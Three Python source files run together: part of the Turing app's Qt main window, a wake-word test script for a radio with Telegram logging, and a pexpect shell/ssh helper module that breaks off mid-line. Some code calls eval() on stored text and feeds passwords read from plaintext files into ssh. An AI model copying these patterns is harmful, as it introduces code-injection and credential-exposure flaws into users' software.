WINDOW[/k] [i]Xmin=[/i][c]{x_min}[/c] [i]Xmax=[/i][c]{x_max}[/c] [i]Ymin=[/i][c]{y_min}[/c] [i]Ymax=[/i][c]{y_max}[/c] [i]Xgrad=[/i][c]{x_grad}[/c] [i]Ygrad=[/i][c]{y_grad}[/c]").format( x_min=code(stmt.x_min), x_max=code(stmt.x_max), y_min=code(stmt.y_min), y_max=code(stmt.y_max), x_grad=code(stmt.x_grad), y_grad=code(stmt.y_grad), ) elif isinstance(stmt, GFuncStmt): ret = translate("Algo", "[k]PLOT FUNCTION[/k] [c]{color}[/c] [i]f[/i]({var}) = [c]{expr}[/c] [k]FROM[/k] [c]{begin}[/c] [k]TO[/k] [c]{end}[/c] [k]STEP[/k] [c]{step}[/c]").format( color=code(stmt.color), var=stmt.var, expr=code(stmt.expr), begin=code(stmt.start), end=code(stmt.end), step=code(stmt.step) ) elif isinstance(stmt, BlockStmt): ret = translate("Algo", "[b]PROGRAM[/b]") elif isinstance(stmt, BaseStmt): ret = translate("Algo", "[i]empty[/i]") else: ret = "unimpl %s" % stmt ret = ret.replace("[b]", block_html()).replace("[/b]", "</span>") ret = ret.replace("[k]", keyword_html()).replace("[/k]", "</span>") ret = ret.replace("[c]", "<code>").replace("[/c]", "</code>") ret = ret.replace("[i]", "<i>").replace("[/i]", "</i>") ret = ret.replace("[t]", comment_html()).replace("[/t]", "</span>") ret = ret.replace("[g]", "<b>").replace("[/g]", "</b>") ret = ret.replace("[n]", "<i>" + red_html()).replace("[/n]", "</span></i>") ret = ret.replace("[s]", red_html()).replace("[/s]", "</span>") ret = util.html.unescape_brackets(ret) ret = ret.replace(" ", " ") return ret.strip() def store_line(item: QTreeWidgetItem, stmt: BaseStmt): GuiState.item_map[id(stmt)] = item, stmt def add_block(block: BlockStmt, current, add=False): current.append(0) for child in block.children: add_line(current, child, add=add) if isinstance(child, BlockStmt): add_block(child, current, add) current[-1] += 1 current.pop() def load_block(stmt: BlockStmt): GuiState.item_map = {} GuiState.ui.treeWidget.clear() AppState.algo = stmt GuiState.root_item, lbl = get_item_html(str_stmt(AppState.algo)) GuiState.ui.treeWidget.addTopLevelItem(GuiState.root_item) store_line(GuiState.root_item, AppState.algo) GuiState.ui.treeWidget.setItemWidget(GuiState.root_item, 0, lbl) current = [] add_block(stmt, current) GuiState.ui.treeWidget.expandAll() def load_pseudocode(algo): code = eval(algo) load_block(code) def load_algo(): load_block(BlockStmt([ ForStmt("i", parse("1"), parse("16"), [ IfStmt(parse("i % 15 == 0"), [ DisplayStmt(parse("\"FizzBuzz\"")) ]), ElseStmt([ IfStmt(parse("i % 3 == 0"), [ DisplayStmt(parse("\"Fizz\"")) ]), ElseStmt([ IfStmt(parse("i % 5 == 0"), [ DisplayStmt(parse("\"Buzz\"")) ]), ElseStmt([ DisplayStmt(parse("i")) ]) ]) ]), ]) ])) def algo_double_click(): if GuiState.ui.btnAlgo_Edit.isEnabled(): btn_edit_line() def algo_sel_changed(): current = get_current_pos() current_stmt = get_current_stmt() is_item = current_stmt is not None is_root = current == [] is_changeable = is_item and not is_root is_editable = is_changeable \ and not isinstance(current_stmt, (BreakStmt, ContinueStmt, ElseStmt)) \ and type(current_stmt) not in [BaseStmt, BlockStmt] GuiState.ui.btnAlgo_Delete.setEnabled(is_changeable) GuiState.ui.btnAlgo_Edit.setEnabled(is_editable) GuiState.ui.btnAlgo_Dupl.setEnabled(is_changeable and not isinstance(current_stmt, ElseStmt)) can_up = is_changeable and current != [0] GuiState.ui.btnAlgo_UpBlock.setEnabled(can_up) GuiState.ui.btnAlgo_Up.setEnabled(can_up) can_down = is_changeable and current != [len(AppState.algo.children) - 1] GuiState.ui.btnAlgo_Down.setEnabled(can_down) GuiState.ui.btnAlgo_DownBlock.setEnabled(can_down) GuiState.ui.btnAlgo_Variable.setEnabled(is_item) GuiState.ui.btnAlgo_Display.setEnabled(is_item) GuiState.ui.btnAlgo_Input.setEnabled(is_item) GuiState.ui.btnAlgo_Call.setEnabled(is_item) GuiState.ui.btnAlgo_Func.setEnabled(is_item) GuiState.ui.btnAlgo_Return.setEnabled(is_changeable) GuiState.ui.btnAlgo_Stop.setEnabled(is_item) GuiState.ui.btnAlgo_Sleep.setEnabled(is_item) GuiState.ui.btnAlgo_If.setEnabled(is_item) GuiState.ui.btnAlgo_Else.setEnabled(is_changeable) GuiState.ui.btnAlgo_For.setEnabled(is_item) GuiState.ui.btnAlgo_While.setEnabled(is_item) GuiState.ui.btnAlgo_Continue.setEnabled(is_changeable) GuiState.ui.btnAlgo_Break.setEnabled(is_changeable) GuiState.ui.btnAlgo_Comment.setEnabled(is_item) GuiState.ui.btnAlgo_GClear.setEnabled(is_item) GuiState.ui.btnAlgo_GWindow.setEnabled(is_item) GuiState.ui.btnAlgo_GPoint.setEnabled(is_item) GuiState.ui.btnAlgo_GLine.setEnabled(is_item) GuiState.ui.btnAlgo_GFunc.setEnabled(is_item) if is_changeable: parent_stack = [AppState.algo] for p in current: parent_stack.append(parent_stack[-1].children[p]) existing_else = current[-1] + 1 < len(parent_stack[-2].children) and isinstance( parent_stack[-2].children[current[-1] + 1], ElseStmt) GuiState.ui.btnAlgo_Else.setEnabled(isinstance(current_stmt, IfStmt) and not existing_else) in_loop = any(x for x in parent_stack if type(x) in [ForStmt, WhileStmt]) GuiState.ui.btnAlgo_Continue.setEnabled(in_loop) GuiState.ui.btnAlgo_Break.setEnabled(in_loop) in_func = any(x for x in parent_stack if type(x) == FuncStmt) GuiState.ui.btnAlgo_Return.setEnabled(in_func) def algo_scroll(event: QWheelEvent): if event.modifiers() and Qt.ControlModifier: if event.angleDelta().y() > 0: handler_ZoomIn() elif event.angleDelta().y() < 0: handler_ZoomOut() event.accept() else: GuiState.ui.treeWidget.wheelEventOrig(event) def fix_qt_shitty_margins(): for wgt in GuiState.window.centralWidget().findChildren(QPushButton): if not wgt.icon().isNull() and wgt.text() and not wgt.text().startswith(" "): wgt.setText(" " + wgt.text()) wgt.setMinimumHeight(28) def init_theme_actions(): def gen(s): return lambda: set_theme(s) for theme in theming.themes: action = QAction(GuiState.window) action.setStatusTip(theme) action.setCheckable(True) action.triggered.connect(gen(theme)) GuiState.ui.menuChangeTheme.addAction(action) if theme == "custom": action.setVisible(bool(theming.themes["custom"][1])) def load_home_actions(): def gen(btn, a): def func(): btn.setEnabled(a.isEnabled()) btn.setText(a.text()) return func for a in [GuiState.ui.actionNew, GuiState.ui.actionOpen]: btn = QFlatButton(GuiState.window) btn.setIcon(a.icon()) btn.clicked.connect(a.triggered) a.changed.connect(gen(btn, a)) GuiState.ui.verticalLayout_3.addWidget(btn) def init_ui(): from forms.ui_mainwindow import Ui_MainWindow GuiState.window = MainWindowWrapper() GuiState.ui = Ui_MainWindow() translator.add(GuiState.ui, GuiState.window) GuiState.ui.setupUi(GuiState.window) load_languages() GuiState.ui.treeWidget.header().setSectionResizeMode(QHeaderView.ResizeToContents) GuiState.algo_base_font = GuiState.ui.treeWidget.font() recent_init_actions() article_thr = article_init_actions(util.settings.value("load_articles", False, type=bool)) if article_thr is None: article_init_button() load_home_actions() load_code_editor() load_plot_canvas() load_algo() init_action_handlers() if sys.platform not in ["darwin", "linux"]: right_corner = QMenuBar() GuiState.ui.menubar.removeAction(GuiState.ui.menuLanguage.menuAction()) right_corner.addAction(GuiState.ui.menuLanguage.menuAction()) GuiState.ui.menubar.setCornerWidget(right_corner) init_event_handlers() init_theme_actions() algo_sel_changed() GuiState.filters = { "all": translate("MainWindow", "Program file (*.py *.tr *.alg)"), "py": translate("MainWindow", "Python file (*.py)"), "tr": translate("MainWindow", "Turing program (*.tr)"), "alg": translate("MainWindow", "Algobox file (*.alg)") } autosave_init() set_show_toolbar(util.settings.value("show_toolbar", True, type=bool)) set_show_toolbar_text(util.settings.value("show_toolbar_text", True, type=bool)) GuiState.ui.actionUseArrowNotation.setChecked(util.settings.value("use_arrow_notation", False, type=bool)) is_deb = False if os.path.exists("/etc/issue"): try: with open("/etc/issue", encoding="utf-8") as fp: issue = fp.read() if re.match("Debian", issue, re.M) or re.match("Ubuntu", issue, re.M): is_deb = True except: pass GuiState.ui.actionLoadRecentArticles.setChecked(util.settings.value("load_articles", False, type=bool)) GuiState.ui.actionCheckForUpdates.setChecked(util.settings.value("check_for_updates", not is_deb, type=bool)) center_widget(GuiState.window, None) fix_qt_shitty_margins() if util.settings.value("load_articles", False, type=bool): article_update_text_end(article_thr) GuiState.window.show() def init_event_handlers(): GuiState.ui.btnSendInput.clicked.connect(send_user_input) GuiState.ui.btnClearOutput.clicked.connect(clear_output) GuiState.ui.btnPrintOutput.clicked.connect(print_output) GuiState.ui.btnSaveOutput.clicked.connect(save_output) GuiState.ui.btnAlgo_Delete.clicked.connect(btn_delete_line) GuiState.ui.btnAlgo_Edit.clicked.connect(btn_edit_line) GuiState.ui.btnAlgo_UpBlock.clicked.connect(btn_move_up_block) GuiState.ui.btnAlgo_Up.clicked.connect(btn_move_up) GuiState.ui.btnAlgo_Down.clicked.connect(btn_move_down) GuiState.ui.btnAlgo_DownBlock.clicked.connect(btn_move_down_block) GuiState.ui.btnAlgo_Dupl.clicked.connect(btn_dupl_line) GuiState.ui.btnAlgo_Variable.clicked.connect(add_def_variable) GuiState.ui.btnAlgo_Display.clicked.connect(add_display) GuiState.ui.btnAlgo_Input.clicked.connect(add_input) GuiState.ui.btnAlgo_Call.clicked.connect(add_call) GuiState.ui.btnAlgo_Func.clicked.connect(add_def_func) GuiState.ui.btnAlgo_Return.clicked.connect(add_return) GuiState.ui.btnAlgo_Stop.clicked.connect(add_stop_stmt) GuiState.ui.btnAlgo_Sleep.clicked.connect(add_sleep_stmt) GuiState.ui.btnAlgo_If.clicked.connect(add_if_block) GuiState.ui.btnAlgo_Else.clicked.connect(add_else_block) GuiState.ui.btnAlgo_For.clicked.connect(add_for_loop) GuiState.ui.btnAlgo_While.clicked.connect(add_while_loop) GuiState.ui.btnAlgo_Continue.clicked.connect(add_continue_stmt) GuiState.ui.btnAlgo_Break.clicked.connect(add_break_stmt) GuiState.ui.btnAlgo_Comment.clicked.connect(add_comment_stmt) GuiState.ui.btnAlgo_GClear.clicked.connect(add_gclear) GuiState.ui.btnAlgo_GWindow.clicked.connect(add_gwindow) GuiState.ui.btnAlgo_GPoint.clicked.connect(add_gpoint) GuiState.ui.btnAlgo_GLine.clicked.connect(add_gline) GuiState.ui.btnAlgo_GFunc.clicked.connect(add_gfunc) GuiState.ui.treeWidget.itemSelectionChanged.connect(algo_sel_changed) GuiState.ui.treeWidget.itemDoubleClicked.connect(algo_double_click) GuiState.ui.treeWidget.wheelEventOrig = GuiState.ui.treeWidget.wheelEvent GuiState.ui.treeWidget.wheelEvent = algo_scroll GuiState.ui.tabWidget.currentChanged.connect(change_tab) def autosave_write(): util.settings.setValue("autosave_type", AppState.mode_python) util.settings.setValue("autosave_date", datetime.datetime.now()) if AppState.mode_python: content = GuiState.code_editor.toPlainText() else: content = repr(AppState.algo) util.settings.setValue("autosave_content", content) def autosave_tick(): if AppState.app_started: if is_modified(): util.settings.setValue("autosave_dirty", True) autosave_write() else: util.settings.setValue("autosave_dirty", False) autosave_clear() def autosave_init(): AppState.autosave_timer = QTimer() AppState.autosave_timer.timeout.connect(autosave_tick) AppState.autosave_timer.start(1000) def autosave_load(): AppState.mode_python = util.settings.value("autosave_type", False, type=bool) content = util.settings.value("autosave_content", "") if AppState.mode_python: GuiState.code_editor.setPlainText(content, "", "") else: load_pseudocode(content) refresh() def autosave_clear(): util.settings.setValue("autosave_dirty", False) util.settings.remove("autosave_content") util.settings.remove("autosave_date") util.settings.remove("autosave_type") def clean_exit(): autosave_clear() GuiState.code_editor.backend.stop() pf_end() sys.exit() def handler_SendFeedback(): QDesktopServices.openUrl(QUrl("https://goo.gl/forms/GVCJoBTQv0jYp3MA3")) def version_check(): import json import urllib.request import re result = json.load(urllib.request.urlopen( urllib.request.Request("https://api.github.com/repos/TuringApp/Turing/releases/latest", headers={'User-Agent': 'Mozilla/5.0'}))) if result and type(result) == dict and "tag_name" in result: version = re.findall(r"[\d.]+", result["tag_name"])[0] current = re.findall(r"[\d.]+", util.__version__)[0] from distutils.version import StrictVersion if StrictVersion(version) > StrictVersion(current): AppState.new_version = True def run_updater(): AppState.new_version = False thr = threading.Thread(target=version_check, args=()) thr.start() while thr.is_alive(): QCoreApplication.processEvents() if AppState.new_version: msg = msg_box(translate("MainWindow", "A new version of Turing is available.\nWould you like to download it?"), parent=GuiState.window) if msg.exec_() == QMessageBox.Yes: QDesktopServices.openUrl(QUrl("https://github.com/TuringApp/Turing/releases/latest")) def autosave_check(): dirty = util.settings.value("autosave_dirty", False, type=bool) if dirty: msg = msg_box( translate("MainWindow", "A modified file has been automatically saved.\nWould you like to recover it?"), parent=GuiState.window) if msg.exec_() == QMessageBox.Yes: autosave_load() else: autosave_clear() def init_pre(): if not hasattr(sys, "frozen"): async_import("editor_backend") init_pre() def init_main(splash): init_ui() set_theme(util.settings.value("app_theme", "default")) change_language(QLocale.system().name()) GuiState.window.show() splash.finish(GuiState.window) if GuiState.ui.actionCheckForUpdates.isChecked(): run_updater() GuiState.window.raise_() GuiState.window.activateWindow() autosave_check() AppState.app_started = True
test_ww.py
import logging import time from threading import Thread import requests from scipy.io.wavfile import read from libs.dsp import get_rms, add_gain from libs.play import play_data from libs.recorder import Recorder from libs.testloop import lombard from telebot.credentials import bot_token from telebot.telegram_logbot import Telebot class MyRec(Recorder): def __init__(self): super(MyRec, self).__init__() self.activated = False self.waiting_for_mic = False self.waiting_for_cancel = False self.waiting_for_music = False self.timeout = 1 def calculate_tresholds(self): input("Turn on radio and press ENTER") self.record(5, channel=1, monitor=True) noise_on = get_rms(self.data)[1] print("RMS: %sdBSPL\n" % (noise_on + self.correction[0])) input("Turn off radio and press ENTER") self.record(5, channel=1, monitor=True) noise_off = get_rms(self.data)[1] print("RMS: %sdBSPL\n" % (noise_off + self.correction[0])) print("\nLombard effect: %0.2fdB" % (lombard(noise_on))) return noise_on, noise_off def on_timeout(self): print("TIMEOUT") if self.waiting_for_music: self.waiting_for_cancel = True print("TIMEOUT: trying again with cancel command") raise KeyboardInterrupt def on_negative_edge(self): print("Negative edge") if self.waiting_for_mic: print("MIC ACTIVATED") self.activated = True self.waiting_for_mic = False self.waiting_for_cancel = True raise KeyboardInterrupt else: pass def on_positive_edge(self): print("Positive edge") if self.waiting_for_cancel: print("COMMAND DETECTED") self.activated = False raise KeyboardInterrupt else: pass def load_settings(): """ Load saved settings """ try: with open("settings/settings.vcfg", "r", encoding="utf-16") as f: for line in f.readlines(): if "MIC_DBFSTODBSPL" in line: r.correction = eval(line.split("=")[-1]) except FileNotFoundError: raise FileNotFoundError("Settings file not found!") return def print_ww_report(filename): with open(filename, "w", encoding="utf-16") as f: f.write("Issued ww:\t %s\n" % issued_ww) f.write("Recognized ww:\t %s\n" % recognized_ww) f.write("Wakeup time\tRecognition time\n") for index in range(len(time_response)): f.write("%0.5f\t%0.5f\n" % (time_wakeup[index], time_response[index])) def telegram_bot_sendtext(bot_message, chat_id): send_text = 'https://api.telegram.org/bot' + bot_token + '/sendMessage?chat_id=' + chat_id + '&parse_mode' \ '=Markdown&text=' + \ bot_message response = requests.get(send_text) return response.json() if __name__ == "__main__": lang = "RUR" # create a thread to record all the process main_recorder = Recorder() t = Thread(target=main_recorder.record, args=(None, 0, None, None, False)) t.start() time.sleep(2) name = input("Insert the name for the WW test:\n-->") t_logging = (input("Activate telegram logging? (y/n)")).lower() if t_logging == "y": telegram_logging = True oscar = Telebot(bot_token) oscar.main() logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO) oscar.send_message("Test started!") else: telegram_logging = False ww = "phrases/harman/%s/%s_000.wav" % (lang, lang) cancel = "phrases/harman/%s/%s_999.wav" % (lang, lang) report_name = "ww_tests/" + name + ".csv" fs, ww_data = read(ww) _, cancel_data = read(cancel) r = MyRec() load_settings() if telegram_logging: oscar.send_message("Calculating treshold...") # Automatically calculate treshold. Just turn on the radio input("Turn on radio and press ENTER") r.record(5, channel=1, monitor=True) # record noise with radio on noise_on = get_rms(r.data)[1] # measure noise print("RMS: %sdBSPL\n" % (noise_on + r.correction[0])) play_data(ww_data, fs) # Wakeword to stop music r.lowtreshold = noise_on - 3 # set default treshold value r.waiting_for_mic = True # recording will stop at negative edge (to detect when music stops) r.record(5, channel=1, monitor=True) # detect when the music actually stops to measure noise without radio r.hightreshold = r.lowtreshold - 3 # set default treshold value r.waiting_for_cancel = True # now recording will stop on positive edge r.record(5, channel=1, monitor=True) # record silence until positive edge play_data(cancel_data, fs) # Cancel command r.waiting_for_music = True # now recording will stop if timeout (noise level under treshold) longer than 1 second r.record(5, channel=1, monitor=True) # ensure that the "cancel" command has been understood (if music resumes) noise_off = get_rms(r.data)[1] # value of noise without radio # Calculate treshold values (negative and positive) print("RMS: %sdBSPL\n" % (noise_off + r.correction[0])) print("\nLombard effect: %0.2fdB" % (lombard(noise_on + r.correction[0]))) ww_data = add_gain(ww_data, lombard(noise_on + r.correction[0])) # adjust gain based on Lombard effect mean_noise = ((noise_on + noise_off) / 2) r.hightreshold = (noise_on + mean_noise) / 2 r.lowtreshold = (noise_off + mean_noise) / 2 txt = "High treshold = %sdB\nLow treshold = %sdB" % (r.hightreshold, r.lowtreshold) print(txt) time.sleep(2) if telegram_logging: try: oscar.send_message("Done! \n" + txt) except Exception as e: print("Something went wrong... :(\n(%s)" % e) n_tests = 200 time_wakeup = [] # array of wakeup times time_response = [] # array of response times issued_ww = 0 # number of issued wakewords recognized_ww = 0 # number of times the wakeword is recognized r.waiting_for_cancel = False r.waiting_for_mic = True try: for i in range(n_tests): if telegram_logging: oscar.bot_text = "Test '%s' (%s of %s)\n" % (name.replace("_", " ").upper(), (i + 1), n_tests) try: oscar.send_message(oscar.bot_text + "...") except Exception as e: print("Something went wrong... :(\n(%s)" % e) start_time = time.time() print("Test number %s" % (i + 1)) cancel_repetitions = 0 while True: play_data(ww_data, fs) t1 = time.time() issued_ww += 1 r.waiting_for_mic = True r.record(10, channel=1, monitor=True) if r.activated: r.waiting_for_mic = False wt = time.time() - t1 print("Time: %0.2fs" % (wt)) recognized_ww += 1 time_wakeup.append(wt) print("Waiting for cancel") while True: r.waiting_for_cancel = True play_data(cancel_data, fs) cancel_repetitions += 1 t2 = time.time() r.record(20, channel=1, monitor=False) rt = time.time() - t2 print("Time: %0.2fs" % rt) # record. If timeout after response is bigger than 3 seconds, assumes the radio is not back # to music r.waiting_for_cancel = False r.waiting_for_music = True print(r.timeout) print("Waiting for response from radio (threshold = %0.2fdB)" % r.lowtreshold) r.record(10, channel=1, l_threshold=r.lowtreshold, monitor=True) if not r.waiting_for_cancel: print("No timeout: music resumed") time_response.append(rt) r.waiting_for_music = False # cancel has been correctly understood print(telegram_logging) if telegram_logging: try: deltat = time.time() - start_time ETA = deltat * (n_tests - (i + 1)) print(ETA) ETA_hours = ETA / 3600 ETA_minutes = (ETA % 3600) / 60 ETA_seconds = ETA % 60 txt = "WW_accuracy: %s of %s" % (recognized_ww, issued_ww) oscar.bot_text += txt mean_wt = sum(time_wakeup) / len(time_wakeup) mean_rt = sum(time_response) / len(time_response) print("Logging to telegram: %s" % oscar.bot_text) oscar.send_message("Done! \n" "Rate: %s of %s\n" "Wakeup time: %0.2fs (mean: %0.2fs)\n" "Recognition time: %0.2fs (mean: %0.2fs)\n" "" % (recognized_ww, issued_ww, wt, mean_wt, rt, mean_rt)) print("DONE") except Exception as e: print("Error! (%s)" % e) print_ww_report(report_name) print("Cancel\nResult: %s/%s" % (recognized_ww, issued_ww)) print("Proceeding to next test") r.activated = False break break else: print("Trying again...") except KeyboardInterrupt: print("Test interrupted") if telegram_logging: oscar.bot_text = "Test completed!" oscar.send_message("Test completed!") print("Saving report...") print_ww_report(report_name) # stopping main recording main_recorder.terminate() print(main_recorder.data) main_recorder.save("ww_tests/%s_FULL_RECORDING.wav" % name)
shell.py
import os import sys from abc import ABC, abstractmethod from dataclasses import dataclass import pexpect from mlib.boot.lang import cn, is_non_str_itr, isinstsafe, islist, isstr from mlib.boot.mlog import err, info, log, LogLevel, warn from mlib.boot.stream import arr, isempty, listmap from mlib.str import utf_decode from mlib.term import log_invokation GIT = '/usr/local/bin/git' class AbstractShell(ABC): @staticmethod def com_arg(a): if isinstsafe(a, os.PathLike): return a.__fspath__() else: return str(a) @staticmethod def command_list(*args): if len(args) == 0: return [''] elif len(args) > 1: return list(map(AbstractShell.com_arg, args)) elif is_non_str_itr(args[0]): return list(map(AbstractShell.com_arg, args[0])) elif isstr(args[0]): return listmap(AbstractShell.com_arg, args[0].split(' ')) else: return [AbstractShell.com_arg(args[0])] @staticmethod def command_str(*args): return ' '.join(AbstractShell.command_list(*args)) def __init__( self, *command, silent=False ): self.command_as_str = AbstractShell.command_str(*command) self.command_as_list = AbstractShell.command_list(*command) if not silent: info(f'$: {self.command_as_str}') self.p = self._start() def __str__(self): return f'{cn(self)}{self.command_as_list}' @abstractmethod def _start(self): # stil removed tpping so I could but pexct import in funciton #-> Union[pexpect.spawn, Popen]: pass @abstractmethod def wait(self): pass @abstractmethod def all_output(self): pass @abstractmethod def readlines(self): pass @abstractmethod def readline(self): pass @abstractmethod def readline_nonblocking(self, timeout=-1): pass @abstractmethod def interact(self): pass @abstractmethod def expect(self, *args): pass @abstractmethod def sendline(self, s): pass def bash(self, s): return self.sendline(f'/bin/bash -c """{AbstractShell.command_str(s)}"""') @abstractmethod def alive(self): pass @abstractmethod def close(self): pass def mypid(): return os.getpid() class ExpectShell(AbstractShell): def __init__( self, *command, silent=False, timeout=None, logfile_read=None, cwd=None, env=None, verbose=False ): from mlib.file import File self.cwd = File(cwd).abspath if cwd is not None else None self.env = env super().__init__(*command, silent=silent) self.p.timeout = timeout self.p.logfile_read = logfile_read self._logging_to_stdout = False if verbose: if logfile_read is not None: err('set logfile read and verbose?') else: self.log_to_stdout() def _start(self): import pexpect return pexpect.spawn(self.command_as_list[0], self.command_as_list[1:], timeout=None, cwd=self.cwd, env=self.env) def wait(self): return self.p.wait() def all_output(self): return '\n'.join(listmap(utf_decode, self.readlines())) def exit_status(self): justdo = self.all_output() return self.p.exitstatus def return_code(self): return self.exit_status() def readlines(self): return self.p.readlines() def readline(self): return self.p.readline() def readline_nonblocking(self, timeout=-1): # in seconds line = '' while True: try: try: c = utf_decode(self.p.read_nonblocking(size=1, timeout=timeout)) except UnicodeDecodeError as e: c = str(e) if c == '\n': return line else: line += c except pexpect.TIMEOUT: return None def readlines_nonblocking(self, timeout=0.1): while True: yield self.readline_nonblocking(timeout=timeout) def pipe_and_close_on(self, expect_s, close_fun=None): for s in self.readlines_nonblocking(): if s is not None: log(s) if s is not None and expect_s in s: log(f'done! ({self} got {expect_s})') if close_fun is not None: close_fun(self) self.close() log('closed p') break @log_invokation(level=LogLevel.INFO) def fake_interact(self, driver=None, driver_args=(), fun=None, d_kwargs={}): self.log_to_stdout(fun=fun, print_not_log=True) if driver is None: driver = lambda: self.all_output() from threading import Thread Thread(target=driver, args=driver_args, kwargs=d_kwargs).start() while self.alive(): s = input_while(lambda: self.alive()) if self.alive(): try: self.sendline(s) except IOError as e: print(f"GOT {e} on sendline") # @log_invokation() def interact(self, force=False): if sys.stdout.isatty(): return self.p.interact() elif force: print('isatty() = false, but force=true. Here goes...') return self.p.interact() else: print('isatty() = false, so just getting output and returning none') self.all_output() return None def expect(self, *args): return self.p.expect(*args) def sendline(self, s): # print('sending line:' + s) if islist(s): s = ' '.join(s) rrr = self.p.sendline(s) # print('sent line') return rrr def alive(self): return self.p.isalive() @log_invokation(level=LogLevel.INFO) def detatch_monitor(self): self._detatch_monitor = True print(f"{self.__class__.__name__} Monitor detatched") @log_invokation(level=LogLevel.INFO) def attatch_monitor(self, period=5, logfile=None): from time import sleep self._detatch_monitor = False def monitor(): log('in monitor thread') while not self._detatch_monitor: data = f"\n\n{self.__class__.__name__} Monitor\n{str(self.p)}\n\n" if logfile is None: print(data) else: from mlib.file import File File(logfile).append(data) sleep(5) log('end of monitor thread') from threading import Thread Thread(target=monitor).start() @log_invokation(level=LogLevel.INFO) def log_to_stdout( self, fun=None, o=None, max_line_length=sys.maxsize, # DEPRECATED, FROM OLD, NOW FIXED ISSUE min_pause=0, just_fun=False, print_not_log=False, stop_on=() ): if self._logging_to_stdout: err("really wanna call this twice?") self._logging_to_stdout = True class MyBuffer: def __init__(self, funn, oo): self.output_buffer = bytearray() self.fun = funn self.o = oo self.last_print = 0 self.stopped = False # @log_invokation def write(self, data: bytes): if self.stopped: return assert not isstr(data) try: data = data.decode('utf-8').replace('\r', '') except UnicodeDecodeError as u: data = "!!![UnicodeDecodeError]!!!" for stop_on_s in stop_on: if stop_on_s in data or data in stop_on_s: last_lines = data.split('\n') for last_line in last_lines: if stop_on_s in last_line or last_line in stop_on_s: break if self.fun is not None: self.fun(last_line, self.o) print(last_line) self.stopped = True return if self.fun is not None: self.fun(data, self.o) if not just_fun: # self.output_buffer.extend(data.encode()) self.output_buffer.extend(data.encode()) # @log_invokation def flush(self): if self.stopped: return if not just_fun: if print_not_log: print(self.output_buffer.decode(), end='') else: log(self.output_buffer.decode()) # needs to go through log function for log table/pie chart to work # sys.stdout.buffer.write(self.output_buffer) self.output_buffer = bytearray() buf = MyBuffer(fun, o) self.p.logfile_read = buf self.p.logfile_send = None self_at_shell = self @dataclass class Stopper: bug: MyBuffer def stop(self): buf.stopped = True self_at_shell._logging_to_stdout = False self_at_shell.p.logfile_read = None return Stopper(buf) def close(self): return self.p.close() class SPShell(AbstractShell): def __init__(self, *command, shell=False, silent=False): self.shell = shell super().__init__(*command, silent=silent) def _start(self): from subprocess import PIPE, Popen, STDOUT return Popen(self.command_as_list, stdin=PIPE, stdout=PIPE, stderr=STDOUT, shell=self.shell) def wait(self): return self.p.wait() def all_output(self): return '\n'.join(self.readlines()) def readlines(self): (stdout, _) = self.p.communicate() stdout = utf_decode(stdout) return stdout.split('\n') def readline(self): return utf_decode(self.p.stdout.readline()) def readline_nonblocking(self, timeout=-1): from queue import Empty, Queue def enqueue_output(out, queue): queue.put(out.readline()) q = Queue() from multiprocessing import Process t = Process(target=enqueue_output, args=(self.p.stdout, q), daemon=True) t.start() try: line = q.get(timeout=timeout) except Empty: t.terminate() return None else: return line def interact(self): raise NotImplementedError def expect(self, *args): raise NotImplementedError def sendline(self, s): self.p.stdin.write(s) def alive(self): return self.p.poll() is None def close(self): self.p.kill() # same as terminate def lambda_and_raise_if_err(self, l=None): if l is None: l = lambda lin: log(f'{self}: {lin}') lines = self.readlines() for line in lines: l(line) if self.p.returncode != 0: raise Exception(f'return code not 0: {self.p.returncode}') def readlines_and_raise_if_err(self): lines = self.readlines() if self.p.returncode != 0: raise Exception(f'return code not 0: {self.p.returncode}') return arr(lines) spshell = SPShell def export(thing, *names): import inspect for name in names: setattr(inspect.getmodule(thing), name, thing) return thing class SSHExpectProcess(ExpectShell): # used to match the command-line prompt SUB_PROMPT = 'PEXPECT' UNIQUE_PROMPT = r"\[" + SUB_PROMPT + r"\][\$\#] " PROMPT = UNIQUE_PROMPT # used to set shell command-line prompt to UNIQUE_PROMPT. PROMPT_SET_SH = r"PS1='[" + SUB_PROMPT + r"]\$ '" def return_from_line(self, line): self.prompt() s = "" def build_str(ss, o): nonlocal s s += ss mystopper = self.log_to_stdout( fun=build_str, o=None, just_fun=True, ) self.sendline(line) self.prompt() mystopper.stop() self.sendline("echo dummyechosowecansendatpromt") def sfilt(sss): return self.SUB_PROMPT not in sss and sss.strip() != line s = '\n'.join([ss for ss in s.split('\n') if sfilt(ss)]) return s def login(self, longpass=False): # print('waiting for passphrase prompt') self.p.expect(['passphrase', 'password']) # print('got passphrase prompt') if longpass: self.sendlongpass() else: self.sendpass() # print('sent password') def sendpass(self): warn('huge security risk 1') with open('/Users/matt/.pass', 'r') as f: self.p.sendline(f.read()[::-1]) def sendlongpass(self): warn('huge security risk 2') with open('/Users/matt/.passlong', 'r') as f: s = f.read()[::-1] self.p.sendline(s) def prompt(self): # print('waiting for prompt') self.p.expect(self.PROMPT) # print('at prompt') def sendatprompt(self, line): self.prompt() self.sendline(line) def setprompt(self): self.p.sendline(self.PROMPT_SET_SH) # print('set prompt') def ssh(*command, **kwargs): return SSHExpectProcess(['/usr/bin/ssh'] + AbstractShell.command_list(*command), **kwargs) def scp(*command, **kwargs): return SSHExpectProcess(['/usr/bin/scp'] + AbstractShell.command_list(*command), **kwargs) class InteractiveExpectShell(ExpectShell): def __init__(self, *command, **kwargs): if isempty(command): command = ['bash'] super().__init__(*command, **kwargs) def __getattr__(self, item): def f(*args): # problem = shell.command_str(*args) # print(f'{problem=}') return self.sendline(f'{item} {shell.command_str(*args)}'.strip()) return f shell = ExpectShell def eshell(*args, **kwargs): return shell(*args, **kwargs).interact() ishell = InteractiveExpectShell @log_invokation def pkill(name): shell(f'pkill -f {name}').interact() # same as eshell but SAFE from weird effects on terminal (no interact, but still blocks) def safeshell(*args, **kwargs): sh = shell(*args, **kwargs) sh.all_output() def arg_str(o): if isinstance(o, bool): return '1' if o else '0' else: return str(o) def pyshell( script, args=(), cd=None, env=None, PYTHONPATH=None, force=False ): pyenv = None if PYTHONPATH is not None: pyenv = {'PYTHONPATH': PYTHONPATH} from mlib.file import File return shell( f'/Users/matt/miniconda3/envs/{env}/bin/python3', File(script).abspath, *args, cwd=cd, env=pyenv ).fake_interact() @dataclass class AddInputEr: keep_going: bool readsem: object # multiprocessing.Semaphore def __call__(self, my_input_queue): stdin = open(0) # I'm stunned... it worked print('start of add_input thread') while self.keep_going: if not self.readsem.acquire(block=True, timeout=0.1): continue c = 